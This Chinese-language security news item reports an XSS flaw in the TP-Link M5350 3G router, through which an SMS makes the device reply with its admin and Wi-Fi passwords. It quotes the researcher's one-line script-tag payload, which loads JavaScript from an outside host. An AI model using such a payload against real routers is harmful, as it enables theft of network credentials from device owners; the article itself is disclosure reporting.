导语:这个漏洞比较有意思,向TP-Link路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。
TP-Link的设备漏洞库又增新丁。
这次的主角是TP-Link M5350,一款便携式3G路由器。
据Bleeping Computer报道,德国安全研究员Jan Hörsch发现,该款路由器存在一枚神奇漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。
这是条什么短信呢?
<script src=//n.ms/a.js></script> (不用试,研究员早把脚本下线了)
漏洞效果图
懂行的读者应该已经知道是怎么回事了。没错,这就是XSS(跨站脚本攻击)漏洞。
作为3G路由器,TP-Link M5350支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。
类似漏洞在互联网产品上比较常见,但能造成此等效果也很罕见,目测是TP-Link内部安全流程没能留意到。
听着厉害,不过想利用漏洞得先搞清楚使用者的3G上网卡号码,难度也不小。
比较奇葩的是,TP-Link目前应该还没修复漏洞。SecurityAffairs专门找了M5350的官方产品页(澳洲版),发现这款路由最新的固件发布日期是2015年1月,显然不是修复版。嘶吼也检索了一番,了解到M5350主要在海外卖,京东淘宝都没有,国内想研究的童鞋显然没啥机会了。